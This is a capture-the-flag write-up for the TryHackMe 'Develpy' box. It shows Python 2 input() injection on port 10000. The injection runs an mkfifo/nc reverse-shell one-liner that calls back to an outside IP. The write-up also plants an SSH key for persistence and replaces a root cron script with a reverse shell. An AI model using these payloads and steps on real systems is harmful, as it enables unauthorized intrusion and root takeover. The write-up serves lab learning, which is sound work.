# Develpy-TryHackMe > This is a writeup for THM box - Develpy > https://tryhackme.com/room/bsidesgtdevelpy > >  > > `Difficulty: Medium` > > `Task 1 ` > > > read user.txt and root.txt > > --- > ## Solution ### Nmap > runnning an `nmap` scan we find 2 services >  > --- ### Port 10000 > Running a deeper scan on port 10000 > ```bash > $nmap -A -p 10000 10.10.38.226 -T4 > ``` >  > > > clearly a python script `exploit.py` is running on port `10000` > > trying different inputs i found that it evaluated `1*2` >  > > > this meant it was `python 2` as `input()` in pyhton2 can evaluate expressions > according to [this](https://intx0x80.blogspot.com/2017/05/python-input-vulnerability_25.html) article. > > we get a [revshell](https://www.revshells.com/) > ```bash > #input to the devil.py > __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.52.250 5051 >/tmp/f') > > #kali: > nc -lvnp 5051 > ``` > > now since revshells are not stable we can `ssh` to the box by saving our public key to `~./ssh/authorized_keys` > > we create a rsa key pair >  > > > we copy the contents of `id_rsa.pub` > > ```bash > #on the box > mkdir ./.ssh > echo '<contents of id_rsa.pub >' > .ssh/authorized_keys > ``` > > we can now ssh to the box > >  > > --- ### Privilege escalation > exploring the system i found that cron jobs were running >  > > > checking the permission of root.sh it was only readable by us but the directory was owned by `king` > >  > > > and i found that even write protected files could be [deleted](https://stackoverflow.com/questions/14496128/why-can-i-delete-write-protect-filehard-link-in-my-own-directory) > so i deleted the file and wrote a rev shell in the new root.sh > >  > > > after `1 min` i got the connection > >  > > > Hence the box is rooted `^_^` > ----